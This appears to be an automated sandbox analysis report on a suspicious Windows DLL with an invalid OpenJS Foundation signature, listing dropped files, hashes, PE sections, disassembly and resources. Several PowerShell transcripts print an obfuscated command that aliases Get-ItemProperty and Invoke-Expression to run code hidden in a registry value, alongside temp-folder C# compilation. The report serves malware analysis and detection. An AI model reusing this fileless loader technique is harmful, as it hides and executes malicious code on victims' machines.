                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723f97Gzxs7+AEszIN723f97V9:p37Lvkmb6K2a9GWZETa9V9
                            MD5:5A76B660E832AA581281D58BC7BAA5A2
                            SHA1:024250002F01662F9AB2370CF4033EA8487665B6
                            SHA-256:B60360D322E1A93A5509DB4EEA774C5FB09F2D2A8B1B92B51D8385E54B872276
                            SHA-512:4461492B81B48FB437055C992CCC555371D16DF08788E6D3AB7512019A7B483D8772D9A3D1192A956736A96A8B0A02B2D3FDD68D84F2EAC82A4B38E95F7BA63E
                            Malicious:false
                            Reputation:unknown
                            Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.0.cs"
                            C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.dll
                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):3584
                            Entropy (8bit):2.635212339978853
                            Encrypted:false
                            SSDEEP:24:etGSN8+mUE7R85z7woel/gE4/eiDPtkZfKGpsDZ0WI+ycuZhN05akSPOPNnq:6DXE7S5gG6iyJKGpCZX1ulua3Kq
                            MD5:EF9522EB6C3500384C36EE79C184EC6B
                            SHA1:FE4AF6485B4A01629F901F753C3DC2D064683718
                            SHA-256:527F9A7FF12525547D21900A699B9BCDADD1C109A11EFDF624411C2E3FEA6C1A
                            SHA-512:7EBD29BDE63276534B24AB60DC274D5D473ED13B20F2AD30B74740D993D9F5C6AAD81F72DC8FA3C42CBA714C3E27B414D5985D2DB617CC68D611DE5A3D7D62EE
                            Malicious:false
                            Reputation:unknown
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..d.............................................................(....*BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...............(...................................... 9............ F............ Y.....P ......d.........j.....v.....{.....................d. ...d...!.d.%...d.......*.....3.;.....9.......F.......Y...........
                            C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.out
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                            Category:modified
                            Size (bytes):872
                            Entropy (8bit):5.293151646200869
                            Encrypted:false
                            SSDEEP:24:AId3ka6K2axETa34KaM5DqBVKVrdFAMBJTH:Akka6CxE+oKxDcVKdBJj
                            MD5:5F3A49EA202366DDFA9816641C833803
                            SHA1:A7BA847BF2CA2BB118F71E6F12BB879B0DA52F29
                            SHA-256:227DF3C5AF341B067B565D4E0BC9C6555F1CCDD660020007014D5DD7C124419B
                            SHA-512:C3E4270BBA10C2213BF049A0A5D6447496D9406848A2C9D2A8BF882F691F4831689E0E10B3A3959464298CC4F7F77FAE6893EB6C4E5035B382C82CDD5D49B9FB
                            Malicious:false
                            Reputation:unknown
                            Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                            C:\Users\user\Documents\20211214\PowerShell_transcript.088753.0fmmIESA.20211214102149.txt
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                            Category:dropped
                            Size (bytes):1379
                            Entropy (8bit):5.379442550983847
                            Encrypted:false
                            SSDEEP:24:BxSAPRN7vBVLVvx2DOXUW+nELCHu4XWDUHjeTKKjX4CIym1ZJXXRenELCHu4S3eP:BZP/vTLVvoOmbu4GYqDYB1Z9gbu4SAZx
                            MD5:D55F220D9892547788887A8A32831118
                            SHA1:1B02881E135C7C81C2D3838A7961A121E7187DD5
                            SHA-256:7F26B4B3D12B445417AEF015E2BE4048848B6D814FE8466848C0B69AFA2272AB
                            SHA-512:858D5CBE3793B79BE8BACCA705F9EA92D39507171ADA3B09FAA71382374AC0A1C719674DB4D7A7BCE8B69BFCACC1CAECDBD7FC97BC6E6CF2FBE655EF08FCDEA3
                            Malicious:false
                            Reputation:unknown
                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20211214102153..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 088753 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))..Process ID: 5784..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211214102153..**********************..PS>new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value
                            C:\Users\user\Documents\20211214\PowerShell_transcript.088753.C1OhZlCs.20211214102152.txt
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                            Category:dropped
                            Size (bytes):1379
                            Entropy (8bit):5.383650096362091
                            Encrypted:false
                            SSDEEP:24:BxSAPRN7vBVLVvx2DOXUW+nELCHu4XW6HjeTKKjX4CIym1ZJXXRenELCHu4SDmnu:BZP/vTLVvoOmbu4G6qDYB1Z9gbu4SDou
                            MD5:68350C66B532BFF0B584D247AD24F0D5
                            SHA1:CE1EB6152EE292AFDCBAE05C7057BAEB61FB2996
                            SHA-256:88CB4539138955AB926F559B2692348F63792A4ED0EE8B30ACE747FB404ECC94
                            SHA-512:80CE793621A577D179F6F633C97D8B39A8EBB79C1E50EFF57EA02BEEBDDD0F320DE6B314913CE7A40077CAE8023957747004AF9C1D9F98E280664CD2822D0828
                            Malicious:false
                            Reputation:unknown
                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20211214102153..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 088753 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))..Process ID: 6444..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211214102153..**********************..PS>new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value
                            C:\Users\user\Documents\20211214\PowerShell_transcript.088753.a52niw8E.20211214102148.txt
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                            Category:dropped
                            Size (bytes):1379
                            Entropy (8bit):5.383634787556345
                            Encrypted:false
                            SSDEEP:24:BxSAPRN7vBVLVvx2DOXUW+nELCHu4XWGHjeTKKjX4CIym1ZJXXRenELCHu4SQDnR:BZP/vTLVvoOmbu4GGqDYB1Z9gbu4SQDR
                            MD5:19F594408E907A61AD2F2145D3840483
                            SHA1:FBFD6B66842B9D146C8B200852764C5FF0FDF33E
                            SHA-256:E7AC349B39C99824312EF83330E3D1EE270DDCF84B0C20C4FDC24C35F4EA3523
                            SHA-512:4FBDF2CBBC63FCED8296EB738DADA7BBD616759859847D127A8680A9209FD91AB060FD95A441079853857E15E156D3863BE944E74390436885E3F19E7ED5B6E1
                            Malicious:false
                            Reputation:unknown
                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20211214102153..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 088753 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))..Process ID: 6448..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211214102153..**********************..PS>new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value
                            C:\Users\user\Documents\20211214\PowerShell_transcript.088753.emLoLZBh.20211214102148.txt
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                            Category:dropped
                            Size (bytes):1379
                            Entropy (8bit):5.38423662326416
                            Encrypted:false
                            SSDEEP:24:BxSAPRN7vBVLVvx2DOXUW+nELCHu4XWF3HjeTKKjX4CIym1ZJXXRenELCHu4S/nI:BZP/vTLVvoOmbu4GF3qDYB1Z9gbu4SPI
                            MD5:DB43AE7808126FE5E4B988C75C7F8F7E
                            SHA1:D4A787EA3FDCD788BC0620482E9B5851802B46C7
                            SHA-256:8E28E9B5EE4C6FF29D3D1F2763EE64BC8E4E6C04264DE5895EE56861225E6760
                            SHA-512:2CE1A34F9A696E42D61D69E37C958E2412229E07B62CABEFBEE1743D1FD59F13F248A94DEEDEC5711E5F5E3DD4067C8E861B5F7569D4F25F4567B115D74F06D4
                            Malicious:false
                            Reputation:unknown
                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20211214102153..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 088753 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))..Process ID: 5640..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211214102153..**********************..PS>new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value

                            Static File Info

                            General

                            File type:MS-DOS executable, MZ for MS-DOS
                            Entropy (8bit):5.271216262919323
                            TrID:
                            • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                            • Generic Win/DOS Executable (2004/3) 0.20%
                            • DOS Executable Generic (2002/1) 0.20%
                            • VXD Driver (31/22) 0.00%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:61b85f75e6a7c.dll
                            File size:1781920
                            MD5:26788bdf519813ff2600570a5c8e23d9
                            SHA1:44f22a053e84cd7afcf34a4fa19dbf512c8a624d
                            SHA256:25f74513f1f0a72453bf096337daba7268bf77371f7fc210f56672f52b7b3af1
                            SHA512:54cad6bdd1ef350a02e6e3645db3fc3f1fadb385c7dcf5eeacf20a8b1d7fbc42aa3cb88d320fda63a7224b2507e7b84e3942cb54fb61cc398800ec95f6f2d505
                            SSDEEP:49152:dOMY8UQw8MT8UQw8MT8UQw8MT8UQw8MT8UQw8MT8UQw8Mc:9Y8UQw8MT8UQw8MT8UQw8MT8UQw8MT8Z
                            File Content Preview:MZ......................................................................!..L.!This .ro.ra. cannot be run in DOS m.de....$.......PE..L...[..a...........!....................................................................................................V..

                            File Icon

                            Icon Hash:82b0f4c6d2c66cb1

                            Static PE Info

                            General

                            Entrypoint:0x1001f3fe
                            Entrypoint Section:.text
                            Digitally signed:true
                            Imagebase:0x10000000
                            Subsystem:windows gui
                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                            DLL Characteristics:
                            Time Stamp:0x61B6D25B [Mon Dec 13 04:55:55 2021 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:90a569c76737ac6eae14ae164dabea89

                            Authenticode Signature

                            Signature Valid:false
                            Signature Issuer:CN=DigiCert SHA2 Assured ID Code Signing CA, OU=www.digicert.com, O=DigiCert Inc, C=US
                            Signature Validation Error:The digital signature of the object did not verify
                            Error Number:-2146869232
                            Not Before, Not After
                            • 10/1/2020 5:00:00 PM 12/18/2023 4:00:00 AM
                            Subject Chain
                            • CN=OpenJS Foundation, O=OpenJS Foundation, L=San Francisco, S=California, C=US
                            Version:3
                            Thumbprint MD5:8E8056A2284F0304445ED325353454BF
                            Thumbprint SHA-1:E16BB6EE4ED3935C46C356D147E811286BA4BBFE
                            Thumbprint SHA-256:968F9536C18A4475095B37792855AA62306275DEC05BD72F21653C98026CFC4E
                            Serial:038EDB2FC6E405731A760F1516144C85

Entrypoint Preview

Instruction
mov ebx, edi
or ebx, edi
jmp 00007FA47086A232h
ret
ret
pop ecx
push esi
pop ebx
ret
mov edi, dword ptr [1000335Ch]
call 00007FA470869118h
mov esp, dword ptr [ebp-18h]
mov word ptr [100030FCh], es
mov ecx, dword ptr [ebp-04h]
lea ebp, dword ptr [esp+10h]
int3
int3
push ebp
push edi
mov dword ptr [10003120h], eax
push eax
je 00007FA470868E06h
int3
mov dword ptr fs:[00000000h], ecx
mov eax, dword ptr [ebp+0Ch]
mov ecx, edi
push eax
jmp dword ptr [100040BCh]
add ecx, eax
mov eax, dword ptr [ecx]
cmp edi, ecx
mov eax, dword ptr [ecx]
push 10000000h
mov eax, dword ptr [ebp-14h]
push 00000000h
push 1001E268h
ret
xor esi, esi
xor esi, esi
xor esi, esi
pop eax
int3
int3
int3
mov esp, dword ptr [ebp-18h]
int3
jmp dword ptr [10004078h]
pop ebx
sete cl
call 00007FA470868CC3h
int3
mov ecx, edi
ret
jmp dword ptr [1000406Ch]
ret
call 00007FA4708689CCh
int3
int3
mov word ptr [100030F8h], fs
cmp dword ptr [10003010h], 00000000h
int3
int3
int3
call 00007FA470868E8Fh
int3
int3
mov ebp, esp
push dword ptr [ebp+08h]
int3
sub al, cl
jmp 00007FA47086BA28h
int3
int3
int3
push eax
mov dword ptr [ebp-04h], eax
int3
cmp dword ptr [00000000h], 00000000h

Data Directories

Name                                 | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x1cff0         | 0x56         | .text
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x43d04         | 0xb4         | .data
IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x47000         | 0x16f8e8     | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x1b1800        | 0x18a0       | .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x1b7000        | 0x6ec        | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT            | 0x28d06         | 0x27c        | .data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |

Sections

Name   | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy       | Characteristics
.text  | 0x1000          | 0x26ec0      | 0x24800  | False    | 0.51682229238   | data      | 5.5020241716  | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data  | 0x28000         | 0x1e4fe      | 0x1be00  | False    | 0.0578843189462 | data      | 6.07273076569 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc  | 0x47000         | 0x16f8e8     | 0x16fa00 | False    | 0.218529518021  | data      | 4.81717219526 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x1b7000        | 0x6ec        | 0x800    | False    | 0.75            | data      | 6.07315256741 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name          | RVA      | Size    | Type | Language | Country
RT_ICON       | 0x4af70  | 0x668   | data | English | United States
RT_ICON       | 0x4b5d8  | 0x2e8   | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577 | English | United States
RT_ICON       | 0x4b8c0  | 0x1e8   | data | English | United States
RT_ICON       | 0x4baa8  | 0x128   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0x4bbd0  | 0xea8   | data | English | United States
RT_ICON       | 0x4ca78  | 0x8a8   | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON       | 0x4d320  | 0x6c8   | data | English | United States
RT_ICON       | 0x4d9e8  | 0x568   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0x4df50  | 0x25a8  | data | English | United States
RT_ICON       | 0x504f8  | 0x10a8  | data | English | United States
RT_ICON       | 0x515a0  | 0x988   | data | English | United States
RT_ICON       | 0x51f28  | 0x468   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0x52390  | 0x12428 | dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 1802201963, next used block 1802201963 | English | United States
RT_ICON       | 0x647b8  | 0x4c28  | dBase IV DBT, blocks size 0, block length 18432, next free block index 40, next free block 0, next used block 4278648832 | English | United States
RT_ICON       | 0x693e0  | 0x4228  | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 33357823 | English | United States
RT_ICON       | 0x6d608  | 0x25a8  | data | English | United States
RT_ICON       | 0x6fbb0  | 0x10a8  | data | English | United States
RT_ICON       | 0x70c58  | 0xeb0   | data | English | United States
RT_ICON       | 0x71b08  | 0x988   | data | English | United States
RT_ICON       | 0x72490  | 0x6b8   | data | English | United States
RT_ICON       | 0x72b48  | 0x468   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0x72fb0  | 0x668   | data | English | United States
RT_ICON       | 0x73618  | 0x2e8   | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577 | English | United States
RT_ICON       | 0x73900  | 0x1e8   | data | English | United States
RT_ICON       | 0x73ae8  | 0x128   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0x73c10  | 0xea8   | data | English | United States
RT_ICON       | 0x74ab8  | 0x8a8   | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON       | 0x75360  | 0x6c8   | data | English | United States
RT_ICON       | 0x75a28  | 0x568   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0x75f90  | 0x25a8  | data | English | United States
RT_ICON       | 0x78538  | 0x10a8  | data | English | United States
RT_ICON       | 0x795e0  | 0x988   | data | English | United States
RT_ICON       | 0x79f68  | 0x468   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0x7a3d0  | 0x668   | data | English | United States
RT_ICON       | 0x7aa38  | 0x2e8   | data | English | United States
RT_ICON       | 0x7ad20  | 0x128   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0x7ae48  | 0xea8   | data | English | United States
RT_ICON       | 0x7bcf0  | 0x8a8   | data | English | United States
RT_ICON       | 0x7c598  | 0x568   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0x7cb00  | 0x452e  | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
RT_ICON       | 0x81030  | 0x25a8  | data | English | United States
RT_ICON       | 0x835d8  | 0x10a8  | data | English | United States
RT_ICON       | 0x84680  | 0x988   | data | English | United States
RT_ICON       | 0x85008  | 0x468   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0x85470  | 0x668   | data | English | United States
RT_ICON       | 0x85ad8  | 0x2e8   | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577 | English | United States
RT_ICON       | 0x85dc0  | 0x1e8   | data | English | United States
RT_ICON       | 0x85fa8  | 0x128   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0x860d0  | 0xea8   | data | English | United States
RT_ICON       | 0x86f78  | 0x8a8   | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON       | 0x87820  | 0x6c8   | data | English | United States
RT_ICON       | 0x87ee8  | 0x568   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0x88450  | 0x25a8  | data | English | United States
RT_ICON       | 0x8a9f8  | 0x10a8  | data | English | United States
RT_ICON       | 0x8baa0  | 0x988   | data | English | United States
RT_ICON       | 0x8c428  | 0x468   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0x8c890  | 0x12428 | dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 1802201963, next used block 1802201963 | English | United States
RT_ICON       | 0x9ecb8  | 0x4c28  | dBase IV DBT, blocks size 0, block length 18432, next free block index 40, next free block 0, next used block 4278648832 | English | United States
RT_ICON       | 0xa38e0  | 0x4228  | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 33357823 | English | United States
RT_ICON       | 0xa7b08  | 0x25a8  | data | English | United States
RT_ICON       | 0xaa0b0  | 0x10a8  | data | English | United States
RT_ICON       | 0xab158  | 0xeb0   | data | English | United States
RT_ICON       | 0xac008  | 0x988   | data | English | United States
RT_ICON       | 0xac990  | 0x6b8   | data | English | United States
RT_ICON       | 0xad048  | 0x468   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0xad4b0  | 0x668   | data | English | United States
RT_ICON       | 0xadb18  | 0x2e8   | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577 | English | United States
RT_ICON       | 0xade00  | 0x1e8   | data | English | United States
RT_ICON       | 0xadfe8  | 0x128   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0xae110  | 0xea8   | data | English | United States
RT_ICON       | 0xaefb8  | 0x8a8   | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON       | 0xaf860  | 0x6c8   | data | English | United States
RT_ICON       | 0xaff28  | 0x568   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0xb0490  | 0x25a8  | data | English | United States
RT_ICON       | 0xb2a38  | 0x10a8  | data | English | United States
RT_ICON       | 0xb3ae0  | 0x988   | data | English | United States
RT_ICON       | 0xb4468  | 0x468   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0xb48d0  | 0x668   | data | English | United States
RT_ICON       | 0xb4f38  | 0x2e8   | data | English | United States
RT_ICON       | 0xb5220  | 0x128   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0xb5348  | 0xea8   | data | English | United States
RT_ICON       | 0xb61f0  | 0x8a8   | data | English | United States
RT_ICON       | 0xb6a98  | 0x568   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0xb7000  | 0x452e  | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
RT_ICON       | 0xbb530  | 0x25a8  | data | English | United States
RT_ICON       | 0xbdad8  | 0x10a8  | data | English | United States
RT_ICON       | 0xbeb80  | 0x988   | data | English | United States
RT_ICON       | 0xbf508  | 0x468   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0xbf970  | 0x668   | data | English | United States
RT_ICON       | 0xbffd8  | 0x2e8   | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577 | English | United States
RT_ICON       | 0xc02c0  | 0x1e8   | data | English | United States
RT_ICON       | 0xc04a8  | 0x128   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0xc05d0  | 0xea8   | data | English | United States
RT_ICON       | 0xc1478  | 0x8a8   | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON       | 0xc1d20  | 0x6c8   | data | English | United States
RT_ICON       | 0xc23e8  | 0x568   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0xc2950  | 0x25a8  | data | English | United States
RT_ICON       | 0xc4ef8  | 0x10a8  | data | English | United States
RT_ICON       | 0xc5fa0  | 0x988   | data | English | United States
RT_ICON       | 0xc6928  | 0x468   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0xc6d90  | 0x12428 | dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 1802201963, next used block 1802201963 | English | United States
RT_ICON       | 0xd91b8  | 0x4c28  | dBase IV DBT, blocks size 0, block length 18432, next free block index 40, next free block 0, next used block 4278648832 | English | United States
RT_ICON       | 0xddde0  | 0x4228  | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 33357823 | English | United States
RT_ICON       | 0xe2008  | 0x25a8  | data | English | United States
RT_ICON       | 0xe45b0  | 0x10a8  | data | English | United States
RT_ICON       | 0xe5658  | 0xeb0   | data | English | United States
RT_ICON       | 0xe6508  | 0x988   | data | English | United States
RT_ICON       | 0xe6e90  | 0x6b8   | data | English | United States
RT_ICON       | 0xe7548  | 0x468   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0xe79b0  | 0x668   | data | English | United States
RT_ICON       | 0xe8018  | 0x2e8   | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577 | English | United States
RT_ICON       | 0xe8300  | 0x1e8   | data | English | United States
RT_ICON       | 0xe84e8  | 0x128   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0xe8610  | 0xea8   | data | English | United States
RT_ICON       | 0xe94b8  | 0x8a8   | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON       | 0xe9d60  | 0x6c8   | data | English | United States
RT_ICON       | 0xea428  | 0x568   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0xea990  | 0x25a8  | data | English | United States
RT_ICON       | 0xecf38  | 0x10a8  | data | English | United States
RT_ICON       | 0xedfe0  | 0x988   | data | English | United States
RT_ICON       | 0xee968  | 0x468   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0xeedd0  | 0x668   | data | English | United States
RT_ICON       | 0xef438  | 0x2e8   | data | English | United States
RT_ICON       | 0xef720  | 0x128   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0xef848  | 0xea8   | data | English | United States
RT_ICON       | 0xf06f0  | 0x8a8   | data | English | United States
RT_ICON       | 0xf0f98  | 0x568   | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON       | 0xf1500  | 0x452e  | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
RT_ICON       | 0xf5a30  | 0x25a8  | data | English | United States
RT_ICON       | 0xf7fd8  | 0x10a8  | data | English | United States
RT_ICON       | 0xf9080  | 0x988   | data | English | United States
